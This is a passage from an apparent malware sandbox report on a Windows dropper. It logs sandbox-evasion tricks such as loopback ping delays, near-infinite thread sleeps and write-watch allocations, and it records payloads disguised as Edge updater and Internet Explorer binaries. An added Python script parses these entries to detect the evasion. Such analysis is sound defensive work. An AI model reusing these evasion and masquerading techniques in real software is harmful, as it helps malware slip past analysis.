Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Memory allocated: 21C1BE90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Memory allocated: 21C357E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Memory allocated: 21C3E140000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe Memory allocated: 1B9E5C80000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe Memory allocated: 1B9FF4B0000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Bound.exe Memory allocated: 21252AF0000 memory reserve | memory write watch
Source: C:\ProgramData\Microsoft\Bound.exe Memory allocated: 2126C4F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft\Bound.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Window / User API: threadDelayed 1222
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Window / User API: threadDelayed 853
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1417
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 2561
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 539
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 764
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1803
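The evasion entries in this section (loopback ping used as a sleep, reserve-with-write-watch allocations, the 922337203685477 delay value, the threadDelayed loop counts) and the PyInstaller `_MEI` extraction directory in the dropped-file entries that follow can be triaged mechanically. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's own "Source: <process> <event>" form and tags each indicator. The sample lines are constructed from entries in this section plus two constructed negatives (a non-loopback ping and a small threadDelayed count). Its assumptions: the 500-iteration loop threshold, the 3-minute long-sleep bound taken from the report's own "Contains long sleeps (>= 3 min)" signature, and the reading of 922337203685477 as floor((2**63-1)/10000), i.e. the largest signed 64-bit 100-ns interval in milliseconds, treated as an effectively infinite wait.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# 922337203685477 == floor((2**63 - 1) / 10000): the largest signed 64-bit 100-ns
# interval expressed in milliseconds. Treating it as an effectively infinite wait is
# this example's assumption about how the sandbox prints the delay.
INFINITE_MS = (2**63 - 1) // 10000
LONG_SLEEP_MS = 3 * 60 * 1000   # the report's own "long sleeps (>= 3 min)" bound
DELAY_LOOP_MIN = 500            # assumed: threadDelayed counts at or above this look like a stalling loop
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
EVASION_TAGS = {"ping-sleep", "write-watch-alloc", "infinite-wait", "long-sleep", "delay-loop"}

LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*(?P<event>.+?)\s*$")
PING_RE = re.compile(r"\bping\s+(?P<host>[\w.:-]+)", re.IGNORECASE)  # "PING.EXE" has no space after ping, so it is skipped
COUNT_RE = re.compile(r"\s-n\s+(?P<count>\d+)", re.IGNORECASE)
DELAY_RE = re.compile(r"Thread delayed: delay time: (?P<ms>\d+)")
LOOP_RE = re.compile(r"threadDelayed (?P<n>\d+)")
MEI_RE = re.compile(r"\\_MEI\d+\\")   # PyInstaller one-file extraction directory


@dataclass
class Event:
    source: str
    event: str
    tags: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[Event]:
    """Split one report line into the source process and the observed event."""
    m = LINE_RE.match(line.strip())
    return Event(m["src"], m["event"]) if m else None


def classify(ev: Event) -> List[str]:
    """Attach indicator tags to one event and return them."""
    e = ev.event
    tags: List[str] = []
    if "Process created:" in e:
        pm = PING_RE.search(e)
        if pm:
            # ping -n N against loopback does nothing but wait roughly N-1 seconds
            if pm["host"].lower() in LOOPBACK and COUNT_RE.search(e):
                tags.append("ping-sleep")
            else:
                tags.append("ping-probe")
    if "memory write watch" in e:
        tags.append("write-watch-alloc")   # MEM_WRITE_WATCH reservation, as flagged in the report summary
    dm = DELAY_RE.search(e)
    if dm:
        ms = int(dm["ms"])
        if ms >= INFINITE_MS:
            tags.append("infinite-wait")
        elif ms >= LONG_SLEEP_MS:
            tags.append("long-sleep")
    lm = LOOP_RE.search(e)
    if lm and int(lm["n"]) >= DELAY_LOOP_MIN:
        tags.append("delay-loop")
    if "Dropped PE file" in e and MEI_RE.search(e):
        tags.append("pyinstaller-extract")
    ev.tags = tags
    return tags


def summarize(lines: List[str]) -> Tuple[List[Event], Counter]:
    """Parse and classify every line; return the events and per-tag counts."""
    events = [ev for ev in map(parse_line, lines) if ev is not None]
    for ev in events:
        classify(ev)
    return events, Counter(t for ev in events for t in ev.tags)


def has_evasion(counts: Counter) -> bool:
    return any(counts[t] > 0 for t in EVASION_TAGS)


# Constructed sample input: entries taken from this section plus two constructed negatives.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 192.0.2.10 -n 1",  # constructed
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Memory allocated: 21C1BE90000 memory reserve | memory write watch",
    r"Source: C:\ProgramData\Microsoft\Bound.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5739",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 12",  # constructed
    r"Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll",
]

if __name__ == "__main__":
    events, counts = summarize(SAMPLE_LINES)
    for ev in events:
        print(f"{ev.tags or ['-']}\t{ev.source}\t{ev.event[:60]}")
    print(dict(counts), "evasion indicators:", has_evasion(counts))
```

Feed it the behaviour lines of a report (or of your own sandbox's export in the same form) and the per-tag counts give a quick picture of how much of the run was spent stalling rather than doing anything observable; a run dominated by ping-sleep, infinite-wait and delay-loop entries usually needs a longer analysis timeout or a sleep-skipping profile before the payload stage is reached.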
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_hashlib.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-memory-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\unicodedata.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-localization-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_socket.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\lapack_lite.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-heap-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-console-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_bounded_integers.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\opencv_videoio_ffmpeg480.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\pyexpat.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\mtrand.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\linalg\_umath_linalg.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_mt19937.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l2-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\psutil\_psutil_windows.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\fft\_pocketfft_internal.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-math-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-profile-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\bit_generator.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-string-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\netifaces.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-process-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_common.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\python37.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_lzma.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\cv2.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\python3.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_sfc64.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-time-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-2-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-string-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-handle-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-util-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_ssl.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-file-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\select.pyd
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-synch-l1-1-0.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_pcg64.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_generator.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\libssl-1_1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random\_philox.cp37-win32.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\_elementtree.pydJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55002\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe TID: 5100Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe TID: 6932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep count: 5739 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep count: 3971 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exe TID: 5476Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep count: 1417 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 539 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep count: 764 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6880Thread sleep count: 127 > 30
